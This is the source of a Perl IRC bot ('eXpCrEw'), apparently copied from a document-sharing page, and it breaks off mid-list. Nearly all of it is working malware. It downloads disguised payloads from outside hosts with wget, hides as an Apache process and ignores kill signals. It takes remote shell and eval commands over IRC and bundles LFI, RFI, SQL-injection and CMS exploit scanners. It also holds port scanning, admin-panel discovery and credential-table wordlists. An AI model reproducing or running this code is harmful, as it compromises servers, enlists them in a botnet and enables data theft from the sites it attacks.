Вы находитесь на странице: 1из 56

#!

/usr/bin/perl
$powered="eXpCrEw";
$mail="redhatcr3w(at)gmail.com";
############################################################
#
____ ___
_________
___________
#
# ____ \ \/ /_____ \_ ___ \______\_ _____/_ _ __ #
#_/ __ \ \
/\____ \/
\ \/\_ __ \
__)_\ \/ \/ / #
#\ ___/ /
\| |_> >
\____| | \/
\\
/ #
# \___ >___/\ \ __/ \______ /|__| /_______ / \/\_/ #
#
\/
\_/__|
\/
\/
#
#
By. AllFree (C) 2011
#
############################################################
use HTTP::Request;
use HTTP::Request::Common;
use HTTP::Request::Common qw(POST);
use LWP::Simple;
use LWP 5.64;
use LWP::UserAgent;
use Socket;
use IO::Socket;
use IO::Socket::INET;
use IO::Select;
use MIME::Base64;
my $datetime = localtime;
my
my
my
my
my
my
my
my

$fakeproc
$ircserver
$ircport
$nickname
$ident
$channel
$admin
$fullname

= "/usr/local/apache2";
= "irc.byroe.net";
= "6667";
= "[KOBRA][".int( rand(999) )."]";
= "BoT";
= "#cool";
= "Kosowar";
= "14eXp1(4C1)14rEw";

my
my
my
my
my
my
my
my
my
my
my
my
my

$nob0dy
=
$lfilogo =
$rfilogo =
$e107logo =
$xmllogo =
$sqllogo =
$oscologo =
$zenlogo =
$oplogo
=
$admlogo =
$smslogo =
$ossqllogo
$e107logosql

"15,1(0+8gCYBER0+15)";
"15,1(0+8LFI0+15)";
"15,1(0+8RFI0+15)";
"15,1(0+8e1070+15)";
"15,1(0+8XML0+15)";
"15,1(0+8SQL0+15)";
"15,1(0+8osCO0+15)";
"15,1(0+8ZEN0+15)";
"15,1(0+8OP-Chart0+15)";
"15,1(0+8pHpMyAdmin0+15)";
"15,1(0+8sms0+15)";
= "15,1(0+8OS-SQL0+15)";
= "15,1(0+8e107-SQL0+15)";

my
my
my
my
my
my
my
my
my
my
my

$lficmd
$rficmd
$e107cmd
$xmlcmd
$sqlcmd
$oscocmd
$zencmd
$admcmd
$opcmd
$ossqlcmd
$esqlcmd

'!lfi';
'!rfi';
'!e107';
'!xml';
'!sql';
'!osco';
'!zen';
'!adm';
'!op';
'!osco';
'!sqle';

=
=
=
=
=
=
=
=
=
=
=

my $cmdlfi
= '@cmdlfi';
my $cmde107 = '@cmde107';
my $cmdxml
= '@cmdxml';
my $injector = "http://www.forosh24s.com/dvdpagat.txt";
my $Shell
= "http://www.forosh24s.com/dvdpagat.txt";
my $rfiid
= "http://www.forosh24s.com/dvdpagat.txt?";#ID
my $botshell = "http://mccluen.com/catalog/images/byroe.jpg";
my $botshell2 = "http://www.forosh24s.com/parepare.txt";
my $botPerl = "http://pastebin.com/Hmt2hs97";
my @uagents = ("Microsoft Internet Explorer/4.0b1 (Windows 95)","Mozilla/1.22
(compatible; MSIE 1.5; Windows NT)","Mozilla/1.22 (compatible; MSIE 2.0; Windows
95)","Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)","Mozilla/4.0 (compatible
; MSIE 5.0; SunOS 5.9 sun4u; X11)","Mozilla/4.0 (compatible; MSIE 5.17; Mac_Powe
rPC)","Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)","Mozilla/4.0 (compatibl
e; MSIE 5.5; Windows NT 5.0)","Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windo
ws 98)","Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)","Mozilla/4.0 (
compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)","Mozilla/4.0 (com
patible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Me
dia Center PC 4.0; .NET CLR 2.0.50727)","Mozilla/4.0 (compatible; MSIE 6.0; Wind
ows NT 5.2; SV1; .NET CLR 1.1.4322)","Mozilla/4.0 (compatible; MSIE 7.0b; Window
s NT 5.1)","Mozilla/4.0 (compatible; MSIE 7.0b; Win32)","Mozilla/4.0 (compatible
; MSIE 7.0b; Windows NT 6.0)","Microsoft Pocket Internet Explorer/0.6","Mozilla/
4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)","MOT-MPx220/1.400 Mozilla
/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;","Mozilla/4.0 (compatible;
MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)","Mozilla/4.0 (co
mpatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)","Mozil
la/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1
;)","Advanced Browser (http://www.avantbrowser.com)","Avant Browser (http://www.
avantbrowser.com)","Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Bro
wser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)","Mozilla/5.0 (
compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)","Mozilla/5.0 (compatible;
Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)","Mozilla/5.0 (Windows;
U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007","Mozilla/5.0 (X11; U
; Linux i686; en-US; rv:1.7.8) Gecko/20050511","Mozilla/5.0 (X11; U; Linux i686;
cs-CZ; rv:1.7.12) Gecko/20050929","Mozilla/5.0 (Windows; U; Windows NT 5.1; nlNL; rv:1.7.5) Gecko/20041202 Firefox/1.0","Mozilla/5.0 (X11; U; Linux x86_64; en
-US; rv:1.7.6) Gecko/20050512 Firefox","Mozilla/5.0 (X11; U; FreeBSD i386; en-US
; rv:1.7.8) Gecko/20050609 Firefox/1.0.4","Mozilla/5.0 (X11; U; Linux i686; en-U
S; rv:1.7.9) Gecko/20050711 Firefox/1.0.5","Mozilla/5.0 (Windows; U; Windows NT
5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6","Mozilla/5.0 (Macintosh; U;
PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6","Mozilla/5
.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7",
"Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/2005091
5 Firefox/1.0.7","Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Geck
o/20050908 Firefox/1.4","Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US;
rv:1.8b4) Gecko/20050908 Firefox/1.4","Mozilla/5.0 (Windows; U; Windows NT 5.1;
nl; rv:1.8) Gecko/20051107 Firefox/1.5","Mozilla/5.0 (Windows; U; Windows NT 5.1
; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1","Mozilla/5.0 (Windows; U; W
indows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1","Mozilla/5.0 (
BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1","Mozilla/5.0
(Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1","Mozil
la/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1
","Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firef
ox/2.0b2","Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918
Firefox/2.0","Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/200
51219 SeaMonkey/1.0b","Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/
20060130 SeaMonkey/1.0","Mozilla/3.0 (OS/2; U)","Mozilla/3.0 (X11; I; SunOS 5.4
sun4m)","Mozilla/4.61 (Macintosh; I; PPC)","Mozilla/4.61 [en] (OS/2; U)","Mozill
a/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)","Mozilla/4.8 [en] (Window
s NT 5.0; U)");

my $uagent
= $uagents[rand(scalar(@uagents))];
my $lfdtest = "../../../../../../../../../../../../../../../../../../../../../
../../../proc/self/environ%00";
my $open_test = "/admin/view/javascript/fckeditor/editor/filemanager/connectors/
test.html";
my $adm_output = ("uid=");
my $open_output = ("FCKeditor - Connectors Tests");
my @tabele
= ('admin','tblUsers','tblAdmin','user','users','usernam
e','usernames','usuario',
'name','names','nombre','nombres','usuar
ios','member','members','admin_table','miembro','miembros','membername','admins'
,'administrator',
'administrators','passwd','password','pa
sswords','pass','Pass','tAdmin','tadmin','user_password','user_passwords','user_
name','user_names',
'member_password','mods','mod','moderato
rs','moderator','user_email','user_emails','user_mail','user_mails','mail','emai
ls','email','address',
'e-mail','emailaddress','correo','correo
s','phpbb_users','log','logins','login','registers','register','usr','usrs','ps'
,'pw','un','u_name','u_pass',
'tpassword','tPassword','u_password','ni
ck','nicks','manager','managers','administrador','tUser','tUsers','administrador
es','clave','login_id','pwd','pas','sistema_id',
'sistema_usuario','sistema_password','co
ntrasena','auth','key','senha','tb_admin','tb_administrator','tb_login','tb_logo
n','tb_members_tb_member',
'tb_users','tb_user','tb_sys','sys','faz
erlogon','logon','fazer','authorization','membros','utilizadores','staff','nuke_
authors','accounts','account','accnts',
'associated','accnt','customers','custom
er','membres','administrateur','utilisateur','tuser','tusers','utilisateurs','pa
ssword','amministratore','god','God','authors',
'asociado','asociados','autores','member
name','autor','autores','Users','Admin','Members','Miembros','Usuario','Usuarios
','ADMIN','USERS','USER','MEMBER','MEMBERS','USUARIO','USUARIOS','MIEMBROS','MIE
MBRO');
my @kolumny
= ('admin_name','cla_adm','usu_adm','fazer','logon','faz
erlogon','authorization','membros','utilizadores','sysadmin','email',
'user_name','username','name','user','us
er_name','user_username','uname','user_uname','usern','user_usern','un','user_un
','mail',
'usrnm','user_usrnm','usr','usernm','use
r_usernm','nm','user_nm','login','u_name','nombre','login_id','usr','sistema_id'
,'author',
'sistema_usuario','auth','key','memberna
me','nme','unme','psw','password','user_password','autores','pass_hash','hash','
pass','correo',
'userpass','user_pass','upw','pword','us
er_pword','passwd','user_passwd','passw','user_passw','pwrd','user_pwrd','pwd','
authors',
'user_pwd','u_pass','clave','usuario','c
ontrasena','pas','sistema_password','autor','upassword','web_password','web_user
name');
$SIG{'INT'} = 'IGNORE';
$SIG{'HUP'} = 'IGNORE';
$SIG{'TERM'} = 'IGNORE';
$SIG{'CHLD'} = 'IGNORE';
$SIG{'PS'}
= 'IGNORE';

chdir("/tmp");
chop (my $priper = `wget http://kkc.or.kr/upload/banner/ipays.jpg -O darwin.jpg;
wget http://luzzer.jatekoldal.net/tmp/redhat.jpg -O redhat.jpg;wget http://capec
urso.com.br/Loja virtual/images/cached.jpg -O cached.jpg;wget http://capecurso.c
om.br/Loja/virtual/images/cached.jpg -O cached.jpg;wget http://luzzer.jatekoldal
.net/tmp/table.jpg -O table.jpg;lwp-download http://kkc.or.kr/upload/banner/ipay
s.jpg -O darwin.jpg;lwp-download http://luzzer.jatekoldal.net/tmp/redhat -O redh
at.jpg;lwp-download http://capecurso.com.br/Loja virtual/images/cached.jpg -O ca
ched.jpg;lwp-download http://capecurso.com.br/Loja virtual/images/cached.jpg -O
cached.jpg;lwp-download http://luzzer.jatekoldal.net/tmp/table.jpg -O table.jpg`
);
$ircserver = "$ARGV[0]" if $ARGV[0];
$0 = "$fakeproc"."\0" x 16;;
&SIGN();
my $pid = fork;
exit if $pid;
die "\n[!] Something Wrong !!!: $!\n\n" unless defined($pid);
our %irc_servers;
our %DCC;
my $dcc_sel = new IO::Select->new();
$sel_client = IO::Select->new();
sub sendraw {
if ($#_ == '1') {
my $socket = $_[0];
print $socket "$_[1]\n";
} else {
print $IRC_cur_socket "$_[0]\n";
}
}
sub connector {
my $mynick = $_[0];
my $ircserver_con = $_[1];
my $ircport_con = $_[2];
my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$ircserver_c
on", PeerPort=>$ircport_con) or return(1);
if (defined($IRC_socket)) {
$IRC_cur_socket = $IRC_socket;
$IRC_socket->autoflush(1);
$sel_client->add($IRC_socket);
$irc_servers{$IRC_cur_socket}{'host'} = "$ircserver_con";
$irc_servers{$IRC_cur_socket}{'port'} = "$ircport_con";
$irc_servers{$IRC_cur_socket}{'nick'} = $mynick;
$irc_servers{$IRC_cur_socket}{'myip'} = $IRC_socket->sockhost;
nick("$mynick");
my $versi = "14eXp1(4C1)14rEw";
sendraw("USER $ident ".$IRC_socket->sockhost." $ircserver_con :$versi");
sleep (1);}}
sub parse {
my $servarg = shift;
if ($servarg =~ /^PING \:(.*)/) {
sendraw("PONG :$1");
}
elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) {
if (lc($1) eq lc($mynick)) {
$mynick = $4;
$irc_servers{$IRC_cur_socket}{'nick'} = $mynick;
}
}

elsif ($servarg =~ m/^\:(.+?)\s+433/i) {


nick("$mynick".int rand(1));
}
elsif ($servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i) {
$mynick = $2;
$irc_servers{$IRC_cur_socket}{'nick'} = $mynick;
$irc_servers{$IRC_cur_socket}{'nome'} = "$1";
sendraw("MODE $mynick +Bx");
sendraw("JOIN $channel");
sleep(2);
sendraw("PRIVMSG $admin :Hi $admin im here !!!");
}
}
my $line_temp;
while( 1 ) {
while (!(keys(%irc_servers))) { &connector("$nickname", "$ircserver", "$ircp
ort"); }
select(undef, undef, undef, 0.01);;
delete($irc_servers{''}) if (defined($irc_servers{''}));
my @ready = $sel_client->can_read(0);
next unless(@ready);
foreach $fh (@ready) {
$IRC_cur_socket = $fh;
$mynick = $irc_servers{$IRC_cur_socket}{'nick'};
$nread = sysread($fh, $ircmsg, 4096);
if ($nread == 0) {
$sel_client->remove($fh);
$fh->close;
delete($irc_servers{$fh});
}
@lines = split (/\n/, $ircmsg);
$ircmsg =~ s/\r\n$//;
if ($ircmsg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/) {
my ($nick,$ident,$host,$path,$msg) = ($1,$2,$3,$4,$5);
my $engine ="GooGLe,ReDiff,Bing,ALtaViSTa,AsK,UoL,CluSty
,GutSer,GooGle2,ExaLead,VirgiLio,WebDe,AoL,SaPo,DuCk,YauSe,BaiDu,KiPoT,GiBLa,Yah
Oo,HotBot,LyCos,LyGo,BLacK,oNeT,SiZuka,WaLLa,DeMos,RoSe,SeZnaM,TisCali,NaVeR";
if ($path eq $mynick) {
if ($msg =~ /^PING (.*)/) {
sendraw("NOTICE $nick :PING $1");
}
if ($msg =~ /^VERSION/) {
sendraw("NOTICE $nick :VERSION mIRC v7.19 Khaled Mardam-Bey"
);
}
if ($msg =~ /^TIME/) {
sendraw("NOTICE $nick :TIME ".$datetime."");
}
if (&isAdmin($nick) && $msg eq "!go") {
&shell("$path","kill -9 $$");
}
if (&isAdmin($nick) && $msg eq "!killall") {
&shell("$path","killall -9 perl");
}
if (&isAdmin($nick) && $msg eq "!reset") {
sendraw("QUIT :Restarting...");
}
if (&isAdmin($nick) && $msg =~ /^!join \#(.+)/) {
sendraw("JOIN #".$1);

}
if (&isAdmin($nick) && $msg =~ /^!part \#(.+)/) {
sendraw("PART #".$1);
}
if (&isAdmin($nick) && $msg =~ /^!nick (.+)/) {
sendraw("NICK ".$1);
}
if (&isAdmin($nick) && $msg =~ /^!pid/) {
sendraw($IRC_cur_socket, "PRIVMSG $nick :9,1Fake Process/PID
: $fakeproc - $$");
}
if (&isAdmin($nick) && $msg !~ /^!/) {
&shell("$nick","$msg");
}
if (&isAdmin($nick) && $msg=~ /^$cmdlfi\s+(.*?)\
s+(.*)/){
my $url = $1.$lfdtest;
my $cmd = $2;
&cmdlfi($url,$cmd,$nick);
}
if (&isAdmin($nick) && $msg=~ /^$cmdxml\s+(.*?)\
s+(.*)/){
my $url = $1;
my $cmd = $2;
&cmdxml($url,$cmd,$nick);
}
if (&isAdmin($nick) && $msg=~ /^$cmde107\s+(.*?)
\s+(.*)/){
my $url = $1;
my $cmd = $2;
&cmde107($url,$cmd,$nick);
}
}
else {
if (&isAdmin($nick) && $msg eq "!go") {
&shell("$path","kill -9 $$");
}
if (&isAdmin($nick) && $msg eq "!killall") {
&shell("$path","killall -9 perl");
}
if (&isAdmin($nick) && $msg eq "!reset") {
sendraw("QUIT :Restarting...");
}
if (&isAdmin($nick) && $msg =~ /^!join \#(.+)/) {
sendraw("JOIN #".$1);
}
if (&isAdmin($nick) && $msg eq "!part") {
sendraw("PART $path");
}
if (&isAdmin($nick) && $msg =~ /^!part \#(.+)/) {
sendraw("PART #".$1);
}
if (&isAdmin($nick) && $msg =~ /^\.sh (.*)/) {
&shell("$path","$1");
}
if (&isAdmin($nick) && $msg =~ /^$mynick (.*)/) {
&shell("$path","$1");
}
if (&isAdmin($nick) && $msg =~ /^!eval (.*)/) {
eval "$1";

}
if ($msg=~ /^$cmdlfi\s+(.+?)\s+(.*)/){
my $url = $1.$lfdtest;
my $cmd = $2;
&cmdlfi($url,$cmd,$path);
}
if ($msg=~ /^$cmdxml\s+(.+?)\s+(.*)/){
my $url = $1;
my $cmd = $2;
&cmdxml($url,$cmd,$path);
}
if ($msg=~ /^$cmde107\s+(.+?)\s+(.*)/){
my $url = $1;
my $cmd = $2;
&cmde107($url,$cmd,$path);
}
if ($msg=~ /^!sms\s+(.*?)\s+(.*)/){
my $no
= $1;
my $pesan = $2;
if(sendSMS($no,$pesan)){
&msg("$path","$smslogo 9 ,1Sukses
mengirim ke 4 ".$no."9 Pengirim : 4 ".$nick);
}
else {
&msg("$path","$smslogo 4 ,1 GAGAL!
!");
}
}
if ($msg=~ /^!help/) {
my $helplogo = "15,1(4@9Help15)";
&msg("$path","$helplogo 14 #####################9[eXp[C]rEw HE
LP]14##############################");
&msg("$path","$helplogo 7 ( $rficmd|$lficmd|$sqlcmd|$xmlcmd [
bug][dork]|!portscan[ip][port]) )");
&msg("$path","$helplogo 7 ( $e107cmd | $zencmd | $oscocmd | $
admcmd | $opcmd [dork] ) ");sleep(2);
&msg("$path","$helplogo 7 ( !login [web]|!port [ip][port]|!ba
se64 [data]|!ip [ip]| )");
&msg("$path","$helplogo 7 ( !about|!engine|!version|!proxy [3
digit]|!dns [host])");
&msg("$path","$helplogo 14 ######################9[eXp[C]rEw E
ND HELP]14#########################");
}
if ($msg=~ /^!engine/) {
my $enginelogo = "15,1(4@9EnginE15)";
&msg("$path","$enginelogo 4 GooGLe,ReDiff,Bing,ALtaViSTa,AsK,
UoL,CluSty,GutSer,GooGle2,ExaLead,VirgiLio");
&msg("$path","$enginelogo 4 WebDe,AoL,SaPo,DuCk,YauSe,BaiDu,K
iPoT,GiBLa,YahOo,HotBot,LyCos,LyGo");
&msg("$path","$enginelogo 4 BLacK,oNeT,SiZuka,WaLLa,DeMos,RoS
e,SeZnaM,TisCali,NaVeR");
}
if ($msg=~ /^!about/) {
my $aboutlogo = "15,1(4@9About15)";
&msg("$path","$aboutlogo 9Nob0dy Priv8 Scanner SE v1.2 by Vrs
-hCk");
&msg("$path","$aboutlogo 8MoD by AllFree gCYBER");

}
if ($msg=~ /^!version/) {
my $versionlogo = "15,1(4@9Version15)";
&msg("$path","$versionlogo 13 priv8 SE v1.2");
}
if ($msg=~ /^!cek/) {
if (&isFound($injector,"aXBheXMg=")) {
&msg("$path","15,1(4@9Injector15)13 Siap 9Tempur!!!");
} else {
&msg("$path","15,1(4@9Injector15)13 Slow 4Down!!!");
}
}
if (&isAdmin($nick) && $msg =~ /^!pid/) {
&notice("$nick","9,1Fake Process/PID : 8$fakeproc - $$");
}
if ($msg=~ /^!proxy\s+(.+)/){
if (my $pid = fork) { waitpid($pid, 0);
} else {
if (fork) { exit; } else {
my $minta = $1;
&msg("$path","15,1(4@9PROXY15)13 Checking Proxy..");
&proxy($path,$minta);
}
exit;
}
}
if ($msg=~ /^!dns\s+(.*)/){
my $nsku = $1;
$mydns = inet_ntoa(inet_aton($nsku));
&msg("$path", "15,1(4@9DNS15) 13$nsku 9Resolve
Ke 4 $mydns");
}
if ($msg=~ /^!port\s+(.*?)\s+(.*)/ ) {
my $hostip= "$1";
my $portsc= "$2";
my $scansock = IO::Socket::INET->new(Pee
rAddr => $hostip, PeerPort => $portsc, Proto =>'tcp', Timeout => 7);
if ($scansock) {
&msg("$path","15,1(4@9PORT15)7 $hostip : $portsc 9Accepted");
}
else {
&msg("$path","15,1(4@9PORT15)7 $hostip : $portsc 4connection refus
ed");
}
}
if ($msg=~ /^!ip\s+(.*)/ ) {
if (my $pid = fork) { waitpid($pid, 0);
} else {
if (fork) { exit; } else {
my $ip = $1;
&msg("$path","15,1(4@9IP15)6
Searching ".$ip." 9Location ...");
my $website = "http://ww
w.ipligence.com/geolocation";
my ($useragent,$request,
$response,%form);
undef %form;

$form{ip} = $ip;
$useragent = LWP::UserAg
ent->new;
$useragent->timeout(5);
$request = POST $websi
te,\%form;
$response = $useragent>request($request);
if ($response->is_succes
s) {
my $res = $response->con
tent;
if ($res =~ m/Yo
ur IP address is(.*)<br>City:(.*)<br\/>Country:(.*)<br>Continent:(.*)<br>Time/g)
{
my ($ipaddress,$
city,$country,$continent) = ($1,$2,$3,$4);
&msg("$path","15,
1(4@9IP15)13 IP Address : ".$ip." 9 ( ".$ipaddress." )");
&msg("$path","15,
1(4@9IP15)13 City
: ".$ip." 9 ( ".$city." )");
&msg("$path","15,
1(4@9IP15)13 Country
: ".$ip." 9 ( ".$country." )");
&msg("$path","15,
1(4@9IP15)13 Continent : ".$ip." 9 ( ".$continent." )");
}
else {
&msg("$path","15,
1(4@9IP15)13 ".$ip." 4not found in database");
}
}
else {
&msg("$path","15,1(4@9IP15)4
Cannot open IP database.");
}
}
exit;
}
}
if ($msg=~ /^!base64 (.*)$/ ) {
if (my $pid = fork) { waitpid($pid, 0);
} else {
if (fork) { exit; } else {
my $hash
= $1;
my $base64_encoded = encode_base
64($hash);
my $base64_decoded = decode_base
64($hash);
&msg("$path","15,1(4@9BASE6415)13 Dec
ode : 9$base64_decoded");
&msg("$path","15,1(4@9BASE6415)13 Enc
ode : 9$base64_encoded");
}
exit;
}
}
if ($msg =~ /^!portscan (.*)$/ ) {
my $hostip="$1";

my @portas=("15","19","98","20","21","22","23
","25","37","39","42","43","49","53","63","69","79","80","101","106","107","109"
,"110","111","113","115","117","119","135","137","139","143","174","194","389","
389","427","443","444","445","464","488","512","513","514","520","540","546","54
8","565","609","631","636","694","749","750","767","774","783","808","902","988"
,"993","994","995","1005","1025","1033","1066","1079","1080","1109","1433","1434
","1512","2049","2105","2432","2583","3128","3306","4321","5000","5222","5223","
5269","5555","6660","6661","6662","6663","6665","6666","6667","6668","6669","700
0","7001","7741","8000","8018","8080","8200","10000","19150","27374","31310","33
133","33733","55555");
my (@aberta, %porta_banner);
&msg("$path","15,1(4@9PORTSCAN15) 13Loading port s
canner.");
foreach my $porta (@portas) {
my $scansock = IO::Socket::INET->new(PeerAddr
=> $hostip, PeerPort => $porta, Proto => 'tcp', Timeout => 4);
if ($scansock) {
push (@aberta, $porta);
$scansock->close;
}
}
if (@aberta) {
&msg("$path", "15,1(4@9portscan15)13 open ports ar
e...:5 @aberta");
} else {
&msg("$path","15,1(4@9portscan15)4 all ports are c
losed");
}
}
if ($msg=~ /^!login (.*)$/ ) {
if (my $pid = fork) { waitpid($pid, 0);
} else {
if (fork) { exit; } else {
my $test = $1 ;
@index = ('/admin/','/ADMIN/','/
login/','/adm/','/cms/','/administrator/','/admin/login.php','/ADMIN/login.php',
'/admin/home.php','/admin/controlpanel.html','/admin/controlpanel.php','/admin.p
hp','/admin.html','/admin/cp.php','/admin/cp.html','/cp.php','/cp.html','/contro
lpanel/','/panelc/','/administrator/index.php','/administrator/login.html','/adm
inistrator/login.php','/administrator/account.html','/administrator/account.php'
,'/administrator.php','/administrator.html','/login.php','/login.html','/control
panel/','/administration/','/administration.php','/administration.html','/phpmya
dmin/','/myadmin/','/wp-admin/','/webadmin/','/webadmin.php','/webadmin.html','/
admins/','/admins.php','/admins.html','/WebAdmin/','/admin1/','/panel/','/cpanel
/','/cPanel/','/members/','/wp-login/','/admin/','/ADMIN/','/login/','/adm/','/c
ms/','/administrator/','/admin/login.php','/ADMIN/login.php','/admin/home.php','
/admin/controlpanel.html','/admin/controlpanel.php','/admin.php','/admin.html','
/admin/cp.php','/admin/cp.html','/cp.php','/cp.html','/controlpanel/','/panelc/'
,'/administrator/index.php','/administrator/login.html','/administrator/login.ph
p','/administrator/account.html','/administrator/account.php','/administrator.ph
p','/administrator.html','/login.php','/login.html','/controlpanel/','/administr
ation/','/administration.php','/administration.html','/phpmyadmin/','/myadmin/',
'/wp-admin/','/webadmin/','/webadmin.php','/webadmin.html','/admins/','/admins.p
hp','/admins.html','/WebAdmin/','/admin1/','/panel/','/cpanel/','/cPanel/','/mem
bers/','/wp-login/','admin/','administrator/','moderator/','webadmin/','adminare
a/','bb-admin/','adminLogin/','admin_area/','panel-administracion/','instadmin/'
,'memberadmin/','administratorlogin/','adm/','admin/account.php','admin/index.ph
p','admin/login.php','admin/admin.php','admin/account.php','admin_area/admin.php
','admin_area/login.php','siteadmin/login.php','siteadmin/index.php','siteadmin/

login.html','admin/account.html','admin/index.html','admin/login.html','admin/ad
min.html','admin_area/index.php','bb-admin/index.php','bb-admin/login.php','bb-a
dmin/admin.php','admin/home.php','admin_area/login.html','admin_area/index.html'
,'admin/controlpanel.php','admin.php','admincp/index.asp','admincp/login.asp','a
dmincp/index.html','admin/account.html','adminpanel.html','webadmin.html','webad
min/index.html','webadmin/admin.html','webadmin/login.html','admin/admin_login.h
tml','admin_login.html','panel-administracion/login.html','admin/cp.php','cp.php
','administrator/index.php','administrator/login.php','nsw/admin/login.php','web
admin/login.php','admin/admin_login.php','admin_login.php','administrator/accoun
t.php','administrator.php','admin_area/admin.html','pages/admin/admin-login.php'
,'admin/admin-login.php','admin-login.php',
'bb-admin/index.html','bb-admin/login.html','bb-admin/admin.html','admin/home.ht
ml','login.php','modelsearch/login.php','moderator.php','moderator/login.php',
'moderator/admin.php','account.php','pages/admin/admin-login.html','admin/adminlogin.html','admin-login.html','controlpanel.php','admincontrol.php',
'admin/adminLogin.html','adminLogin.html','admin/adminLogin.html','home.html','r
cjakar/admin/login.php','adminarea/index.html','adminarea/admin.html',
'webadmin.php','webadmin/index.php','webadmin/admin.php','admin/controlpanel.htm
l','admin.html','admin/cp.html','cp.html','adminpanel.php','moderator.html',
'administrator/index.html','administrator/login.html','user.html','administrator
/account.html','administrator.html','login.html','modelsearch/login.html','moder
ator/login.html','adminarea/login.html','panel-administracion/index.html','panel
-administracion/admin.html','modelsearch/index.html','modelsearch/admin.html','a
dmincontrol/login.html','adm/index.html','adm.html','moderator/admin.html','user
.php','account.html','controlpanel.html','admincontrol.html','panel-administraci
on/login.php','wp-login.php','adminLogin.php','admin/adminLogin.php','home.php',
'admin.php','adminarea/index.php','adminarea/admin.php','adminarea/login.php','p
anel-administracion/index.php','panel-administracion/admin.php','modelsearch/ind
ex.php','modelsearch/admin.php','admincontrol/login.php','adm/admloginuser.php',
'admloginuser.php','admin2.php','admin2/login.php','admin2/index.php','adm/index
.php','adm.php','affiliate.php','adm_auth.php','memberadmin.php','administratorl
ogin.php','admin1.php','admin1.html','admin2.php','admin2.html','yonetim.php','y
onetim.html','yonetici.php','yonetici.html','ccms/','ccms/login.php','ccms/index
.php','maintenance/','webmaster/','adm/','configuration/','configure/','websvn/'
,'admin/','admin/account.php','admin/account.html'. 'admin/index.php','admin/ind
ex.html','admin/login.php'. 'admin/login.html','admin/home.php','admin/controlpa
nel.html','admin/controlpanel.php','admin.php','admin.html','admin/cp.php','admi
n/cp.html','cp.php','cp.html','administrator/','administrator/index.html','admin
istrator/index.php','administrator/login.html','administrator/login.php','admini
strator/account.html','administrator/account.php','administrator.php','administr
ator.html','login.php','login.html','modelsearch/login.php','moderator.php','mod
erator.html','moderator/login.php','moderator/login.html','moderator/admin.php',
'moderator/admin.html','moderator/','account.php','account.html','controlpanel/'
,'controlpanel.php','controlpanel.html','admincontrol.php','admincontrol.html','
adminpanel.php','adminpanel.html','admin1.asp','admin2.asp','yonetim.asp','yonet
ici.asp','admin/account.asp','admin/index.asp','admin/login.asp','admin/home.asp
','admin/controlpanel.asp','admin.asp','admin/cp.asp','cp.asp','administrator/in
dex.asp','administrator/login.asp','administrator/account.asp','administrator.as
p','login.asp','modelsearch/login.asp','moderator.asp','moderator/login.asp','mo
derator/admin.asp','account.asp','controlpanel.asp','admincontrol.asp','adminpan
el.asp','fileadmin/','fileadmin.php','fileadmin.asp','fileadmin.html','administr
ation/','administration.php','administration.html','sysadmin.php','sysadmin.html
','phpmyadmin/','myadmin/','sysadmin.asp','sysadmin/','ur-admin.asp','ur-admin.p
hp','ur-admin.html','ur-admin/','Server.php','Server.html','Server.asp','Server/
','wp-admin/','administr8.php','administr8.html','administr8/','administr8.asp',
'webadmin/','webadmin.php','webadmin.asp','webadmin.html','administratie/','admi
ns/','admins.php','admins.asp','admins.html','administrivia/','Database_Administ
ration/','WebAdmin/','useradmin/','sysadmins/','admin1/','system-administration/
','administrators/','pgadmin/','directadmin/','staradmin/','ServerAdministrator/
','SysAdmin/','administer/','LiveUser_Admin/','sys-admin/','typo3/','panel/','cp

anel/','cPanel/','cpanel_file/','platz_login/','rcLogin/','blogindex/','formslog
in/','autologin/','support_login/','meta_login/','manuallogin/','simpleLogin/','
loginflat/','utility_login/','showlogin/','memlogin/','members/','login-redirect
/','sub-login/','wp-login/','login1/','dir-login/','login_db/','xlogin/','smblog
